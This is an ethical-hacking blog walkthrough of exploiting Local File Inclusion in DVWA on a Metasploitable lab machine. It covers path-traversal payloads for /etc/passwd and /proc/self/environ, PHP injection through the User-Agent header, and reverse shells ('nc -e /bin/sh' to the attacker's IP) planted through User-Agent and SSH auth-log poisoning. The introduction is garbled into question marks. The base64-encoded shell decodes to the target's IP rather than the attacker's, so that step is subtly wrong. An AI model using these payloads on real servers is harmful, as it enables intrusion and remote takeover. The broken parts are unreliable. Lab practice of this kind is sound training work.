Local File Inclusion(LFI) Vulnerability & Remote Files Access From Server Using LFI

Local File Inclusion(LFI) Vulnerability & Remote Files Access From Server Using LFI

Minhazul Islam Asif Minhazul Islam Asif

Minhazul Islam Asif

CEO & Founder at CodemanBD & WebBattalion

发布日期: 2022年9月29日
+ 关注

LFI Vulnerability ???

?LFI ?? ???? ????? ???????? ?? ????????? ?? ????? ???????????? ?????????????? ????? ??? ???? ??????? Malicious ???????? Inject ???? ???? ?? ????????? ?????? ???? ???? ??? ??????? ????????? / ????? ????????? ? ?????? ???? ?????

No alt text provided for this image


Payloads to get access using remote code

● /proc/self/environ

● /var/log/auth.log

● /var/log/apache2.accesslog

?

LFI Vulnerability Live Process: using /etc/passwd & /proc/self/environ payloads


> Open Metasploitable machine > ifconfig > take IP

> In kali browser > put the IP > click DVWA

> DVWA user : admin & password: password

> DVWA > Security low

> go > File Inclusion & Get the link

● Link : https://192.168.37.129/dvwa/vulnerabilities/fi/?page=include.php

● Try to see the directory: https://192.168.37.129/dvwa/vulnerabilities/fi/include.php

No alt text provided for this image


LFI vulnerability Check using payload:


We will see in this server LFI vulnerability exist or not, so we will use payload or malicious code to check that.

payload or malicious code: /etc/passwd

● Imposing payload to access the main directory(in browser) : https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../etc/passwd

>> This vulnerability will work on DVWA low and medium security*

No alt text provided for this image


Payloads to get access using remote code


/proc/self/environ

/var/log/auth.log

/var/log/apache2.accesslog

Replace /etc/passwd to /proc/self/environ

----------

● https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ

No alt text provided for this image


Remote Code Execution (PHP Code)

Now using burpsuite we will execute remove code

> In kali > search with burp > open

> set up proxy in mozilla > mozilla > settings > search with proxy > choose manual proxy & put the IP 127.0.0.1 & Port: 8080

● now go burp > proxy > intercept on & visit the link from mozilla: https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ

> now you capture the request in burp

No alt text provided for this image


> In Burp click INSPECTOR (at right) > request header > user agent > click arrow

> now we will add a remote PHP code to check its getting execute ?

> add this code: <? phpinfo(); ?>

No alt text provided for this image


> apply changes > forward the request

> in browser you will see DVWA is showing its php informations

> so remote code can be executed

No alt text provided for this image


领英推荐

Using Netcat we will take server access now

Netcat or NC is a utility tool that uses TCP and UDP connections to read and write in a network. In the case of attacking. It helps us to debug the network along with investing it. It runs on all operating systems. In Kali its installed in default.

First, we will have to create a listener. We will use the following command to create a listener. POrt can be anything like 8080, 8888.

● in kali : nc -h (to see all cmd)

● nc -l -vv -p 8888

where,

[-l]: Listen Mode

[-vv]: Verbose Mode {It can be used once, but we use twice to be more verbose, it is used to know information about server / machine}

[p]: Local Port

No alt text provided for this image


Add reverse shell to burp

● in burp > again intercept ON > capture request of https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ

● INSPECTOR > user agent > put the reserve shell code : <?passthru("nc -e /bin/sh 192.168.37.128 8888");?>

(NB: 192.168.37.128 is my kali IP)

No alt text provided for this image


● now in kali > NC get the connection

> pwd (to see direcory)

> ls (see all files)

> cd /var/www/dvwa/

> Now you go to root file and you can hamper any file

No alt text provided for this image


LFI Vulnerability Live Process: using another payload (/var/log/auth.log) and get access using SSH Port


● DVWA : Security : Medium

● Instead of https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../etc/passwd we will use https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../var/log/auth.log

No alt text provided for this image


create a listener with Netcat:

> First, we will have to create a listener. We will use the following command to create a listener. POrt can be anything like 8080, 8888.

● nc -l -vv -p 8888

?

In another kali terminal we will execute the SSH Code


> General code : to access through SSH Port :

● ssh -oHostKeyAlgorithms=+ssh-rsa "<?passthru('nc -e /bin/sh 192.168.37.128 8888');?>"@192.168.37.129

NB: like trying to access through SSH, user name: passthru/reverse shell@domain/IP

NB: 192.168.37.128 is my kali IP *

NB: 192.168.37.129 is my Metasploitable machine IP *

● encode nc -e /bin/sh 192.168.37.128 8888 using burp (open burp > decover > encode as base64 > get encoded code)

No alt text provided for this image

> after encode the SSH code will be

● ssh -oHostKeyAlgorithms=+ssh-rsa "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjM3LjEyOSA4ODg4'));?>"@192.168.37.129

No alt text provided for this image


> In mozilla reload https://192.168.37.129/dvwa/vulnerabilities/fi/?page=/../../../../../var/log/auth.log

> now see the netcat listening window & you get the connection

> pwd (to see direcory)

> ls (see all files)

> cd /var/www/dvwa/

> Now you go to root file and you can hamper any file

No alt text provided for this image

?Read more blogs on ethical hacking from here.


Thanks

Minhazul Asif?

要查看或添加评论,请登录

Minhazul Islam Asif的更多文章

社区洞察

其他会员也浏览了